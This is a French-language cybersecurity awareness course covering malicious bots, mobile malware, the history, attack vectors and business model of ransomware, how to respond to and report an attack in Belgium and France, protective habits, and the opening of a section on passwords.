Les sites web et les applications de rencontres sont des refuges pour les robots bavards malveillants. Ces robots prétendent être une personne, imitant l'interaction humaine, et trompent souvent les gens qui ne réalisent pas qu'ils discutent avec des programmes nuisibles dont le but est d'obtenir des informations personnelles, y compris des numéros de carte de crédit, de victimes peu méfiantes.

* **Les robots de partage de fichiers**&#x20;

Ces robots prennent le terme de la requête de l'utilisateur (par exemple un film populaire ou l'album d'un artiste) et répondent à la requête en indiquant qu'ils ont le fichier à télécharger et en fournissant un lien. L'utilisateur clique sur le lien, télécharge et ouvre le fichier, et infecte son ordinateur sans le savoir.

* **Credential stuffing**&#x20;

Il s'agit de robots qui "remplissent" des noms d'utilisateur et des mots de passe connus (généralement issus de violations de données) dans des pages de connexion en ligne afin d'obtenir un accès non autorisé aux comptes des utilisateurs.

* **Bots DoS ou DDoS**&#x20;

Il s'agit d'un trafic excessif de robots utilisé intentionnellement pour submerger les ressources d'un serveur et empêcher le fonctionnement d'un service.

{% hint style="success" %}
DoS & DDoS attack:

Une **attaque par déni de service** (**DoS attack** pour *Denial of Service attack* en anglais) est une attaque informatique ayant pour but de rendre indisponible un service, d'empêcher les utilisateurs légitimes d'un service de l'utiliser.

À l’heure actuelle la grande majorité de ces attaques se font à partir de plusieurs sources, on parle alors d'attaque par **déni de service distribuée** (**DDoS** **attack** pour *Distributed Denial of Service attack*).

Définition: [**WIKIPEDIA**](https://fr.wikipedia.org/wiki/Attaque_par_d%C3%A9ni_de_service)
{% endhint %}

## **Mobile Malware**

Les logiciels malveillants mobiles sont des logiciels malveillants spécifiquement conçus pour cibler les appareils mobiles, tels que les smartphones et les tablettes, dans le but d'accéder à des données privées.

Bien que les logiciels malveillants mobiles ne soient pas actuellement aussi répandus que les logiciels malveillants qui s'attaquent aux postes de travail traditionnels, il s'agit d'une menace croissante car de nombreuses entreprises autorisent désormais les employés à accéder aux réseaux d'entreprise à l'aide de leurs appareils personnels, ce qui peut amener des menaces inconnues dans l'environnement.

#### **Types de malware sur Mobile**

Les cybercriminels utilisent diverses tactiques pour infecter les appareils mobiles. Si vous cherchez à améliorer votre protection contre les logiciels malveillants mobiles, il est important de comprendre les différents types de menaces liées aux logiciels malveillants mobiles. Voici quelques-uns des types les plus courants :

* <mark style="color:purple;">**Les outils d'accès à distance**</mark> (**RATs** de l'anglais "**Remote Access Tools**") offrent un accès étendu aux données des appareils victimes infectés et sont souvent utilisés pour la collecte de renseignements. Les RATs peuvent généralement accéder à des informations telles que les applications installées, l'historique des appels, les carnets d'adresses, l'historique de navigation sur Internet et les données SMS. Les RATs peuvent également être utilisés pour envoyer des SMS, activer les caméras des appareils et enregistrer les données GPS.&#x20;
* <mark style="color:purple;">**Les chevaux de Troie bancaires**</mark> sont souvent déguisés en applications légitimes et cherchent à compromettre les utilisateurs qui effectuent leurs opérations bancaires - y compris les transferts d'argent et les paiements de factures - à partir de leurs appareils mobiles. Ce type de cheval de Troie vise à dérober les données de connexion et les mots de passe financiers.&#x20;
* [<mark style="color:blue;">**Le ransomware**</mark>](#ransomware) est un type de logiciel malveillant utilisé pour verrouiller l'accès d'un utilisateur à son appareil et exiger le paiement d'une "rançon", généralement en bitcoins intraçables. Une fois que la victime a payé la rançon, des codes d'accès lui sont fournis pour lui permettre de déverrouiller son appareil mobile.
* <mark style="color:purple;">**Cryptomining Malware**</mark> permet aux attaquants d'exécuter secrètement des calculs sur l'appareil d'une victime - ce qui leur permet de générer des crypto-monnaies. Le cryptomining est souvent effectué par le biais d'un code de Troie caché dans des applications d'apparence légitime.&#x20;
* <mark style="color:purple;">**La fraude aux clics publicitaires**</mark> est un type de logiciel malveillant qui permet à un attaquant de détourner un appareil pour générer des revenus grâce à de faux clics publicitaires.

#### Distribution

Il existe plusieurs moyens sur lesquels les attaquants s'appuient pour distribuer leur code malveillant mais les plus utilisés sont : &#x20;

* **Hameçonnage mobile et usurpation d'identité:**&#x20;

L'hameçonnage (voir la partie [**PHISHING dans la Capsule 1**](/french/capsule-1-sensibilisation/phishing#definition-et-contexte)) est une pratique qui consiste à tromper quelqu'un pour l'amener à fournir des informations personnelles ou des données de compte précieuses, souvent par le biais de l'usurpation d'identité.&#x20;

L'usurpation d'identité consiste à déguiser une communication électronique ou un site web en une entité de confiance de la victime. Si l'usurpation d'identité et le hameçonnage vont souvent de pair, l'usurpation d'identité peut être utilisée à d'autres fins néfastes que le hameçonnage d'informations de compte. Par exemple, un courriel usurpé peut tenter de convaincre le destinataire de cliquer sur un lien malveillant.

Alors que le phishing s'est traditionnellement concentré sur l'acquisition d'informations d'identification par courrier électronique, le phishing par messages SMS (smshishing) et par applications de messagerie est devenu beaucoup plus répandu. En fait, 57 % des organisations ont été confrontées à une attaque de phishing mobile. Cela ne devrait pas être trop surprenant si l'on considère le fait que les gens sont 18 fois plus susceptibles de cliquer sur un lien suspect sur un appareil mobile que sur un ordinateur de bureau.

L'une des méthodes les plus courantes pour inciter les victimes à installer des logiciels malveillants consiste à leur envoyer, par SMS, des liens vers des fichiers Android Package (APK) hébergés sur des sites Web contrôlés par des attaquants. Par exemple, les victimes peuvent être invitées à cliquer sur un lien SMS vers un site bancaire usurpé, conçu pour paraître digne de confiance et convaincre la victime de "mettre à jour son application bancaire". La mise à jour installe alors le code malveillant, ce qui permet à l'attaquant d'obtenir un accès et de collecter des informations d'identification.


# Malware - Ransomware

Cette partie définira le ransomware, expliquera son origine ainsi que son évolution au cours des années, et donnera les indications pour se protéger et détecter une attaque.

## Définition

Les logiciels malveillants à rançon, appelés aussi ransomware ou rançongiciel, sont un type de logiciels malveillants qui empêchent les utilisateurs d'accéder à leur système ou à leurs fichiers personnels et exigent le paiement d'une rançon afin de retrouver l'accès.&#x20;

Alors que certaines personnes pourraient penser "un virus a verrouillé mon ordinateur", les rançongiciels sont généralement classés dans une autre catégorie de logiciels malveillants que les virus.&#x20;

Les premières variantes de ransomware ont été développées à la fin des années 1980, et le paiement devait être envoyé par courrier postal. Aujourd'hui, les auteurs de ransomware ordonnent que le paiement soit envoyé par crypto-monnaie ou carte de crédit, et les attaquants ciblent les particuliers, les entreprises et les organisations de toutes sortes. Certains auteurs de ransomware vendent le service à d'autres cybercriminels, ce qui est connu sous le nom de Ransomware-as-a-Service ou RaaS.

## Histoire

### Le point de départ&#x20;

Le premier exemple connu de ransomware est le logiciel **AIDS Trojan**, également connu sous le nom de **Aids Info Disk** ou encore **PC Cyborg Trojan**, qui a été créé en 1989 par un groupe de hackers appelé « The AIDS Information Team ». Ce malware se propageait via un disque floppy et une fois installé sur l'ordinateur de la victime, il affichait un message demandant à l'utilisateur de payer une rançon de **189$** pour débloquer l'ordinateur.

Le but du AIDS Trojan était de collecter de l'argent pour la recherche sur le VIH/sida selon un de ses auteurs Dr.Joseph Popp, mais le logiciel a été largement critiqué pour avoir utilisé des méthodes malhonnêtes pour collecter de l'argent. Bien que le AIDS Trojan ait été le premier exemple connu de ransomware, il n'a pas eu un impact significatif sur le monde de la cybersécurité à l'époque et n'a pas vraiment été considéré comme un véritable malware.

<figure><img src="/files/RltSPS6sVGTqDdzCv5pO" alt=""><figcaption><p>Message après l'activation du SIDA</p></figcaption></figure>

Le AIDS Trojan était un logiciel malveillant qui se propageait via un disque floppy infecté. Une fois installé sur l'ordinateur de la victime, il modifiait le fichier **AUTOEXEC.BAT**, ce qui empêchait l'ordinateur de démarrer correctement. Lorsque l'utilisateur redémarrait son ordinateur, il voyait alors un message lui demandant de payer une rançon de 189 dollars pour débloquer son ordinateur.

{% hint style="info" %}
**AUTOEXEC.BAT:**

AUTOEXEC.BAT est le nom d’un fichier système rencontré à l’origine dans le système d’exploitation MS-DOS. Il s’agit d’un fichier batch de type .bat (fichier de commandes au format texte) situé à la racine du périphérique sur lequel l’ordinateur démarre. Le nom du fichier vient de la concaténation des mots automatic et execution, décrivant ainsi sa fonction qui est d’exécuter automatiquement des commandes dès le démarrage du système. Le mot AUTOEXEC a également été créé de façon à respecter la règle de nommage du système de fichiers FAT qui impose un format 8.3 (c’est-à-dire 8 caractères, un point, 3 caractères).

Définition: [**WIKIPEDIA**](https://fr.wikipedia.org/wiki/Autoexec.bat)
{% endhint %}

Depuis, des familles de logiciels malveillants plus sophistiquées sont apparues, comme **GpCode** en 2004, qui se propageait via des campagnes de **malspam** et dont les victimes étaient invitées à utiliser des cartes-cadeaux comme Ukash pour payer la rançon. Ce logiciel malveillant chiffrait les fichiers comme les ransomwares actuels, mais il contenait des failles cryptographiques qui rendaient le processus de récupération plutôt facile.

{% hint style="success" %}
**MalSpam**:\
Le spam malveillant (malspam) est un courrier électronique non sollicité qui cherche à transmettre une charge utile malveillante, soit par le biais d'une pièce jointe Microsoft Office, soit en incitant l'utilisateur à cliquer sur un lien dans le courrier électronique.
{% endhint %}

Vers 2011, une nouvelle menace de ransomware est apparue : Reveton (le ransomware de la police). Ce malware ne chiffrait pas les fichiers mais verrouillait l'écran des victimes, affichant un avertissement menaçant de la police et demandant aux utilisateurs de payer une amende avec des cartes cadeaux prépayées comme Paysafecard et MoneyPak. L'avertissement était localisé dans différentes langues et utilisait des logos de police pertinents, ce qui rendait la situation plus réaliste pour les victimes.

<figure><img src="/files/GtvjWl7mGUBy0vr5U7JH" alt=""><figcaption><p>Message du ransomware qui se fait passer pour la police belge</p></figcaption></figure>

### Bitcoin et Ransomware

La cybercriminalité - une vaste catégorie d'activités malveillantes qui comprend tous les types d'attaques cybercriminelles, notamment les logiciels malveillants, les chevaux de Troie bancaires, les ransomwares,... - a saisi l'opportunité de monétisation créée par le bitcoin. Cela s'est traduit par une prolifération importante des ransomwares à partir de 2012.&#x20;

{% hint style="info" %}
**BITCOIN**:

Bitcoin est une technologie pair à pair fonctionnant sans autorité centrale. La gestion des transactions et la création de bitcoins est prise en charge collectivement par le réseau. Bitcoin est *libre et ouvert*. Sa conception est publique, personne ne possède ni ne contrôle Bitcoin et tous peuvent s'y joindre. Grâce à plusieurs de ses propriétés uniques, Bitcoin rend possible des usages prometteurs qui ne pourraient pas être couverts par les systèmes de paiement précédents.

\
Définition: [**BITCOIN.ORG**](https://bitcoin.org/fr/)
{% endhint %}

Toutefois, ce modèle économique de ransomware reste imparfait, car si les paiements en bitcoins sont des transactions faciles à utiliser pour les cybercriminels, il n'est pas toujours aussi facile pour leurs cibles non technophiles de s'y retrouver. Pour garantir le paiement, certains criminels sont allés jusqu'à ouvrir des centres d'appel pour fournir une assistance technique et aider les victimes à s'inscrire à Bitcoin - mais cela prend du temps et coûte de l'argent.

Lorsque le Bitcoin a commencé à gagner en popularité, les développeurs de ransomwares ont compris qu'il s'agissait de la méthode d'extraction monétaire qu'ils recherchaient. Les échanges de bitcoins ont fourni aux adversaires le moyen de recevoir des paiements instantanés tout en conservant l'anonymat, le tout transigé en dehors du cadre strict des institutions financières traditionnelles.

Voici une liste non exhaustive de ransomware connus et leur fonctionnement :

1. [**Cryptolocker** ](https://www.varonis.com/fr/blog/cryptolocker-tout-ce-que-vous-devez-savoir)(2013) : Ce ransomware chiffrait les fichiers de l'utilisateur et exigeait une rançon pour les déchiffrer. Il se propageait généralement via des e-mails de spam contenant des pièces jointes infectées.
2. [**WannaCry**](https://www.kaspersky.fr/resource-center/threats/ransomware-wannacry) (2017) : Ce ransomware a été l'un des plus importants de l'histoire en termes de portée et de dégâts causés. Il s'est propagé rapidement à l'échelle mondiale en exploitant une faille de sécurité dans les systèmes Windows. Il a causé des perturbations importantes dans les hôpitaux, les entreprises et d'autres organisations.
3. [**NotPetya** ](https://fr.wikipedia.org/wiki/Cyberattaque_NotPetya)(2017) : Ce ransomware s'est propagé principalement en Ukraine en se faisant passer pour une mise à jour du logiciel de comptabilité popularisé dans le pays. Il a rapidement étendu son infection à d'autres pays, causant des perturbations importantes dans les entreprises et les organisations.
4. [**LockerGoga**](https://www.bitdefender.fr/blog/hotforsecurity/bitdefender-sort-un-dechiffreur-contre-ransomware-lockergoga/) (2019) : Ce ransomware a ciblé principalement les entreprises et les organisations, causant des perturbations importantes dans leur fonctionnement. Il a été utilisé dans des attaques de type "rançon logicielle" visant à chiffrer les fichiers de l'utilisateur et à exiger une rançon pour les déchiffrer.
5. [**Ryuk**](https://www.trendmicro.com/fr_fr/what-is/ransomware/ryuk-ransomware.html) (2019) : Ce ransomware cible principalement les entreprises et les organisations et exige une rançon importante pour déchiffrer les fichiers. Il a été impliqué dans de nombreuses attaques de rançon logicielle de grande envergure.

## Conséquences d'une attaque

#### Revenus

Une attaque par ransomware peut gravement affecter la capacité de fonctionnement d'une organisation. Même si l'organisation est bien préparée et dispose de sauvegardes fonctionnelles, la restauration des systèmes affectés peut prendre des heures. Pire encore, les organisations qui n'étaient pas aussi bien préparées, ou dont les sauvegardes ont pu être compromises pendant l'attaque, peuvent mettre des jours ou des semaines à retrouver leur pleine capacité opérationnelle, ce qui signifie que leurs revenus vont diminuer ou s'arrêter complètement pendant qu'elles se rétablissent.

#### Réputation

Une violation de données ou une attaque par ransomware peut nuire à la réputation d'une entreprise. Certains clients peuvent considérer une attaque réussie comme un signe de faiblesse des pratiques de sécurité, ou être si gravement touchés par une interruption de service qu'ils choisissent de changer de compagnie.

#### Financier

Les rançongiciels entraînent des coûts inattendus et ils sont coûteux. En plus de la perte de revenus qu'une organisation peut subir, il y a d'autres coûts qui peuvent être évidents et d'autres qui ne le sont pas. Les coûts les plus évidents sont les suivants : le coût du paiement de la rançon (si elle est payée) ; le coût de l'assainissement de l'incident, y compris le nouveau matériel, les logiciels et les services de réponse aux incidents ; les franchises d'assurance ; les honoraires d'avocat et les litiges ; et les relations publiques. D'autres coûts moins évidents peuvent inclure : l'augmentation des primes d'assurance, la dévaluation de la réputation/du nom de famille et la perte de la propriété intellectuelle.

#### Données

Lors d'une attaque par ransomware, un acteur malveillant chiffre de nombreux fichiers, les rendant inutilisables, ainsi que les systèmes qui en dépendent. Si une rançon n'est pas payée, ces fichiers chiffrés sont souvent verrouillés de manière permanente, obligeant l'organisation à régénérer les informations, si elle le peut. Cependant, même si une rançon est payée, il n'y a aucune garantie qu'un acteur de la menace agira avec bienveillance et fournira une clé de déchiffrement. De plus, même si une clé est fournie, il est toujours possible que l'attaque par ransomware ait causé des dommages destructeurs importants, ce qui peut nécessiter de reconstruire les systèmes affectés de toute façon. En outre, si l'acteur de la menace a volé un secret commercial, des informations exclusives ou des informations personnellement identifiables (IPI), la perte de ces données peut donner lieu à une action en justice ou entraîner la perte d'un avantage concurrentiel.

## Vecteurs d'attaque

#### Par mail

Les [attaques de phishing](/french/capsule-1-sensibilisation/phishing/phishing-techniques) sont l'un des systèmes de diffusion les plus courants des ransomwares. Dans ces attaques, les pirates réussissent à convaincre une personne de cliquer sur un lien ou d'ouvrir une pièce jointe qui télécharge ensuite le ransomware sur son système. Ce vecteur d'attaque prend souvent la forme d'une ingénierie sociale dans laquelle les cybercriminels se font passer pour une personne en qui le destinataire a confiance et l'incitent à accorder un accès administratif aux systèmes de l'entreprise.&#x20;

Ils existent différentes techniques:

* Liens de phishing intégrés au corps du message

<figure><img src="/files/dq83x6uA8YzkLjWrT7WQ" alt=""><figcaption><p>Un lien frauduleux redirige l'utilisateur vers le FAUX site</p></figcaption></figure>

* Pièces jointes malveillantes

<figure><img src="/files/WUDAajgIgeniqLOGsVtf" alt=""><figcaption><p>Le mail contient une pièce jointe malveillante </p></figcaption></figure>

#### Pages Web&#x20;

Le code d'un ransomware malveillant peut également se trouver dans des scripts Web cachés dans des sites apparemment légitimes ou compromis. Il s'agit d'un vecteur d'attaque parfait pour les cybercriminels car les victimes croient visiter un site de confiance. Lorsqu'une personne visite ce site, le code est automatiquement téléchargé et, une fois exécuté, il peut infecter le système de l'utilisateur et se déplacer latéralement dans l'organisation, en chiffrant les fichiers et les données.

#### Pop-ups&#x20;

Les publicités et les fenêtres pop-up sont un autre vecteur courant d'attaques de ransomware sur Internet. Elles peuvent sembler authentiques, mais comme les systèmes de phishing, elles peuvent inciter les internautes à cliquer dessus en se faisant passer pour une marque de confiance. À ce moment-là, elles dirigent l'utilisateur vers une nouvelle fenêtre ouverte contenant des liens malveillants ou téléchargent automatiquement des ransomwares ou d'autres formes de logiciels malveillants sur l'ordinateur de l'utilisateur.

<figure><img src="/files/LRC1R5YdRntpuIxr5AwE" alt=""><figcaption><p>Un pop-up qui demande de faire une mise à jour chrome, mais qui au final télécharge le ransomware</p></figcaption></figure>

#### Messages instantanés&#x20;

Alors que les utilisateurs sont de plus en plus sensibilisés au hameçonnage par courrier électronique, les pirates se sont tournés vers les plateformes de messagerie instantanée telles que WhatsApp, Slack, Snapchat, Facebook Messenger et Microsoft Teams pour mener des campagnes de [smishing](/french/capsule-1-sensibilisation/phishing/phishing-techniques#smishing). Ces menaces fonctionnent à peu près de la même manière que les attaques par courrier électronique, où le ransomware est lancé lorsqu'un utilisateur clique sur un lien ou une pièce jointe provenant d'un expéditeur se présentant comme une entreprise réputée.

Par le passé, de nombreuses organisations ont bloqué ces plateformes, mais avec l'essor des habitudes de travail à distance, la messagerie instantanée est devenue un outil de collaboration essentiel pour les entreprises du monde entier, ce qui rend ces attaques difficiles à éviter.

<figure><img src="/files/yWvbMxkggjrSXjPoPbTw" alt=""><figcaption></figcaption></figure>

#### Messages texte&#x20;

Les messages textuels sont un vecteur extrêmement populaire pour les ransomwares. Les messages de spam, d'usurpation d'identité et de phishing sont les principaux coupables, les attaquants utilisant souvent des ransomware-as-a-service ou des malware-for-hire pour exécuter facilement et à moindre coût des attaques de ransomware. Lorsqu'un utilisateur clique sur un lien, le ransomware est téléchargé sur son appareil et peut se propager à toutes les personnes de sa liste de contacts, y compris ses collègues.

<figure><img src="/files/y2e99MYgk7enR8Z99S2F" alt=""><figcaption></figcaption></figure>

## Ransomware as a Service (RaaS)

Ransomware as a Service (RaaS) est un modèle commercial entre les opérateurs de ransomware et les affiliés dans lequel les affiliés paient pour lancer des attaques de ransomware développées par les opérateurs. Le service de ransomware est une variante du modèle commercial SaaS (Software as a Service).

{% hint style="info" %}
SaaS ou Software as a Service:

Le software as a service (SaaS) ou logiciel en tant que service, est un modèle d'exploitation commerciale des logiciels dans lequel ceux-ci sont installés sur des serveurs distants plutôt que sur la machine de l'utilisateur. Les clients ne paient pas de licence d'utilisation pour une version, mais utilisent librement le service en ligne ou, plus généralement, payent un abonnement.

Définition: [**WIKIPEDIA**](https://fr.wikipedia.org/wiki/Software_as_a_service)
{% endhint %}

Les kits RaaS permettent aux affiliés qui n'ont pas les compétences ou le temps de développer leur propre variante de ransomware d'être opérationnels rapidement et à moindre coût. Ils sont faciles à trouver sur le dark web, où ils sont annoncés de la même manière que les marchandises sur le web légal.

Un kit RaaS peut inclure une assistance 24h/24 et 7j/7, des offres groupées, des avis d'utilisateurs, des forums et d'autres fonctionnalités identiques à celles proposées par les fournisseurs SaaS légitimes. Le prix des kits RaaS varie de 40 dollars par mois à plusieurs milliers de dollars - des montants insignifiants, si l'on considère que la demande de rançon moyenne en 2021 était de 6 millions de dollars. Un acteur de la menace n'a pas besoin que chaque attaque soit un succès pour s'enrichir.

Il existe quatre modèles de revenus RaaS courants :

* L'abonnement mensuel pour un montant forfaitaire&#x20;
* Les programmes d'affiliation, qui sont identiques au modèle de frais mensuels mais dont un pourcentage des bénéfices (généralement 20-30%) va au développeur du ransomware&#x20;
* Droit de licence unique sans participation aux bénéfices
* Participation aux bénéfices pure et simple

Les opérateurs RaaS les plus sophistiqués proposent des portails qui permettent à leurs abonnés de voir le statut des infections, le total des paiements, le total des fichiers cryptés et d'autres informations sur leurs cibles. Un affilié peut simplement se connecter au portail RaaS, créer un compte, payer avec des bitcoins, entrer des détails sur le type de malware qu'il souhaite créer et cliquer sur le bouton d'envoi. Les affiliés peuvent avoir accès à l'assistance, aux communautés, à la documentation, aux mises à jour des fonctionnalités et à d'autres avantages identiques à ceux dont bénéficient les abonnés à des produits SaaS légitimes.

<figure><img src="/files/GwTRC1HY1Utv3pSaqGzf" alt=""><figcaption><p>Satan RaaS</p></figcaption></figure>

## Réagir à une attaque Ransomware

### Rester calme et réfléchi&#x20;

Il est difficile de rester calme lorsque vous ne pouvez pas accéder aux fichiers importants de votre ordinateur. Mais la première mesure à prendre après avoir été touché par un ransomware est de ne pas paniquer et de garder son sang-froid.

La plupart des gens se précipitent pour payer la rançon avant d'analyser la gravité de la situation dans laquelle ils se trouvent. Rester calme et prendre du recul peut parfois ouvrir des portes de négociations avec l'attaquant ou de résolution du problème sans même payer.

### Prendre une photo/screenshot&#x20;

de la note du ransomware La deuxième étape consiste à prendre immédiatement une photo de la note du ransomware sur votre écran grâce à votre smartphone ou à un appareil photo. Si possible, faites également une capture d'écran sur la machine affectée.

Cela vous aidera à remplir un rapport de police et accélérera le processus de récupération.

{% hint style="success" %}
Raccourci sur windows pour faire un screenshot:&#x20;

**WINDOWS+SHIFT+S**

<img src="/files/gEer2HGUjB7Qz3P2PCX0" alt="" data-size="original">
{% endhint %}

### Mettre les systèmes affectés en quarantaine&#x20;

Il est important d'isoler les systèmes affectés dès que possible. Les ransomwares analysent généralement le réseau cible et se propagent latéralement à d'autres systèmes.

Il est préférable de séparer les systèmes affectés du réseau pour contenir l'infection et empêcher le ransomware de se propager.

### Rechercher des outils de déchiffrement

Heureusement, de nombreux outils de déchiffrement sont disponibles en ligne, sur des sites tels que [**No More Ransom**](https://www.nomoreransom.org/fr/index.html).

Si vous connaissez déjà le nom de la souche de votre ransomware, il vous suffit de le saisir sur le web et de rechercher la clé de déchiffrement correspondante. La liste n'est pas alphabétique, et le site ajoute de nouveaux outils de déchiffrement en bas de la liste.

### Désactiver les tâches de maintenance&#x20;

Vous devez immédiatement désactiver les tâches de maintenance automatisées, telles que la suppression des fichiers temporaires et la rotation des journaux, sur les systèmes concernés. Cela empêchera ces tâches d'interférer avec des fichiers qui pourraient être utiles pour l'analyse forensique et l'enquête.

{% hint style="info" %}
Analyse Forensique:

**L’analyse forensique** (plus fréquemment appelée « **forensic** ») consiste à **investiguer un système d’information après une cyberattaque**. Les analystes vont collecter l’ensemble des données brutes (fichiers effacés, disques durs, sauvegardes, journaux des systèmes…), les étudier pour comprendre ce qu’il s’est passé et établir des conclusions. Cette tâche, parfois ardue, permet de produire des preuves nécessaires à une action interne ou au lancement d’une procédure judiciaire par exemple.

Définition: [**TEHTRIS**](https://tehtris.com/fr/blog/glossaire/forensic)
{% endhint %}

### Déconnecter les sauvegardes&#x20;

La plupart des souches modernes de ransomware s'attaquent immédiatement aux sauvegardes pour contrecarrer les efforts de récupération.

Il est donc impératif pour vous ou votre entreprise de sécuriser vos sauvegardes en les séparant du reste du réseau. Vous devez également verrouiller l'accès aux systèmes de sauvegarde jusqu'à ce que l'infection soit éliminée.

### Signaler le ransomware&#x20;

Dès que vous constatez une attaque par ransomware, veillez à contacter les forces de l'ordre.

Les ransomwares constituent un crime et doivent être signalés aux autorités policières locales. Même si les forces de l'ordre ne peuvent pas vous aider à déchiffrer vos fichiers, elles peuvent au moins aider d'autres personnes à éviter un sort similaire.

Information: [**Belgique** ](#belgique-signaler-une-attaque)/ [**France** ](#france-signaler-une-attaque)

### Décider de payer ou non&#x20;

Décider de payer pour un ransomware n'est pas une décision facile et comporte des avantages et des inconvénients. Ne payez que si vous avez épuisé toutes les autres options et que la perte de données est plus dommageable pour vous ou votre entreprise que le paiement de la rançon.

## Protection contre les ransomware: Les bons réflexes

### Ne cliquez jamais sur des liens dangereux

Évitez de cliquer sur les liens contenus dans les messages de spam ou sur des sites Web inconnus. Si vous cliquez sur des liens malveillants, un téléchargement automatique pourrait être lancé, ce qui pourrait entraîner l'infection de votre ordinateur.

### Évitez de divulguer des informations personnelles

Si vous recevez un appel, un message texte ou un courriel d'une source non fiable vous demandant des informations personnelles, ne répondez pas. Les cybercriminels qui planifient une attaque par ransomware peuvent essayer de collecter des informations personnelles à l'avance, qui sont ensuite utilisées pour adapter les messages de phishing spécifiquement à votre intention. En cas de doute sur la légitimité du message, contactez directement l'expéditeur.

<figure><img src="/files/kkyAumI2gNLj7V4rI4I1" alt=""><figcaption></figcaption></figure>

### N'ouvrez pas les pièces jointes d'un courriel suspect

Les ransomwares peuvent également se frayer un chemin jusqu'à votre appareil par le biais de pièces jointes d'emails. Évitez d'ouvrir toute pièce jointe d'aspect douteux. Pour vous assurer que le courriel est digne de confiance, prêtez une attention particulière à l'expéditeur et vérifiez que l'adresse est correcte. N'ouvrez jamais les pièces jointes qui vous invitent à exécuter des macros pour les visualiser. Si la pièce jointe est infectée, son ouverture entraînera l'exécution d'une macro malveillante qui donnera au logiciel malveillant le contrôle de votre ordinateur.

<figure><img src="/files/u6tSgSbkninxGCXQMl2Z" alt=""><figcaption></figcaption></figure>

### N'utilisez jamais de clés USB inconnues

Ne connectez jamais de clés USB ou d'autres supports de stockage à votre ordinateur si vous ne savez pas d'où ils proviennent. Des cybercriminels peuvent avoir infecté le support de stockage et l'avoir placé dans un lieu public pour inciter quelqu'un à l'utiliser.&#x20;

<figure><img src="/files/lrwoCp2DAkCbbPPoeiZP" alt=""><figcaption></figcaption></figure>

### Maintenez vos programmes et votre système d'exploitation à jour

La mise à jour régulière des programmes et des systèmes d'exploitation contribue à vous protéger des logiciels malveillants. Lorsque vous effectuez des mises à jour, veillez à bénéficier des derniers correctifs de sécurité. Les cybercriminels auront ainsi plus de mal à exploiter les vulnérabilités de vos programmes.

<figure><img src="/files/0THzVVU5SUHYCbin0eM7" alt=""><figcaption></figcaption></figure>

Le terme technique utilisé est le patch management ou gestion des correctifs.

{% hint style="info" %}
Gestion des correctifs:\
La **gestion des correctifs consiste** à identifier et à déployer des mises à jour logicielles, également appelées « correctifs » ou « patchs », sur différents endpoints, notamment des ordinateurs, des terminaux mobiles et des serveurs.

Les correctifs sont généralement distribués par les développeurs de logiciels pour corriger des vulnérabilités de sécurité ou des problèmes techniques connus. Ils permettent également d’ajouter de nouvelles fonctionnalités et fonctions à l’application. Ces solutions à court terme sont destinées à être utilisées jusqu’à la publication de la version suivante du logiciel.

Définition: [**Crowdstrike**](https://www.crowdstrike.fr/cybersecurity-101/patch-management/)
{% endhint %}

### N'utilisez que des sources de téléchargement connues

Pour minimiser le risque de télécharger un ransomware, ne téléchargez jamais de logiciels ou de fichiers multimédias à partir de sites inconnus. Faites confiance aux sites vérifiés et dignes de confiance pour les téléchargements. Les sites Web de ce type peuvent être reconnus grâce aux sceaux de confiance. Assurez-vous que la barre d'adresse du navigateur de la page que vous visitez utilise "https" au lieu de "http". Un symbole de bouclier ou de verrou dans la barre d'adresse peut également indiquer que la page est sécurisée. Faites également preuve de prudence lorsque vous téléchargez quoi que ce soit sur votre appareil mobile. Vous pouvez faire confiance au Google Play Store ou à l'App Store d'Apple, en fonction de votre appareil.

### Utilisez les services VPN sur les réseaux Wi-Fi publics

L'utilisation consciencieuse des réseaux Wi-Fi publics est une mesure de protection judicieuse contre les ransomwares. Lorsque vous utilisez un réseau Wi-Fi public, votre ordinateur est plus vulnérable aux attaques. Pour rester protégé, évitez d'utiliser le Wi-Fi public pour les transactions sensibles ou utilisez un service VPN sécurisé.

## Belgique: Signaler une attaque

Il est possible de porter plainte auprès de la police locale et de signaler l'incident à **CERT.be** via **<cert@cert.be>** en indiquant le type de support de données, le système d'exploitation, le mode d'infection, le nom du ransomware, le mode de paiement et, si possible, en fournissant des captures d'écran du système informatique infecté. Cette action peut contribuer à la lutte contre la cybercriminalité au niveau international, même si elle ne garantit pas toujours une solution à l'infection par ransomware.

<figure><img src="/files/YESDmfK6vEG8KvokqqJ8" alt=""><figcaption><p>Les adresses du CERT.BE et Centre pour la Cybersécurité Belgique</p></figcaption></figure>

## France: Signaler une attaque

"Ce téléservice peut être utilisé **uniquement si vous êtes un particulier** et si vous déposez plainte **en votre nom propre**.

Même si vous portez plainte en ligne, vous pouvez demander à rencontrer un enquêteur. L'enquêteur peut aussi décider de vous auditionner s'il l'estime nécessaire." \
\
Message du Ministère chargé de l'intérieu&#x72;**.**

{% embed url="<https://www.service-public.fr/particuliers/vosdroits/R45977>" %}


# Passwords - Mots de passe

Cette première partie définira les mots de passe, expliquera son origine ainsi que son évolution au cours des années, et donnera les indications pour mieux les utiliser et les protéger.

## Définition et Contexte

<figure><img src="/files/9FYsdQfo3HbkCTSJHcSI" alt=""><figcaption></figcaption></figure>

{% hint style="success" %}
**Mot de passe** (en anglais Password)

1. Mot utilisé pour obtenir l’accès à certaines informations ou à un certain lieu.
2. *(Informatique)* Code alphanumérique ou phrase, moyen d’authentification, qu’il faut donner pour accéder à un endroit protégé ou pour utiliser une ressource ou un service dont l’accès est limité et protégé.

Définition: [**La Langue Française**](https://www.lalanguefrancaise.com/dictionnaire/definition/mot-de-passe)
{% endhint %}

Un mot de passe est un mot, une phrase ou une chaîne de caractères destinés à différencier un utilisateur ou un processus autorisé (dans le but de permettre l'accès) d'un utilisateur non autorisé. En d'autres termes, un mot de passe est utilisé pour prouver l'identité d'une personne ou pour autoriser l'accès à une ressource.

L'histoire a montré l'utilité des mots de passe dans le temps mais cela a aussi démontré l'impact des mots de passes qui sont brisés/découverts et aussi que l'évolution des technologies permettent plus facilement d'accéder aux mots de passes qui autrefois étaient jugés comme "solides".


# Passwords - Origines

## Les mots de passes dans le temps

### Les anciens temps et les guerres

Dans l'histoire occidentale, les premiers mots de passe enregistrés ont été utilisés par les militaires, à commencer par[ le livre biblique des Juges](https://fr.wikipedia.org/wiki/Livre_des_Juges) (plusieurs siècles avant J-C). Dans ce livre, les soldats de Galaad utilisent le mot "shibboleth" pour repérer leurs ennemis, les Ephraïmites. Les Ephraïmites parlaient un dialecte différent, de sorte qu'ils disaient plutôt "sibboleth".&#x20;

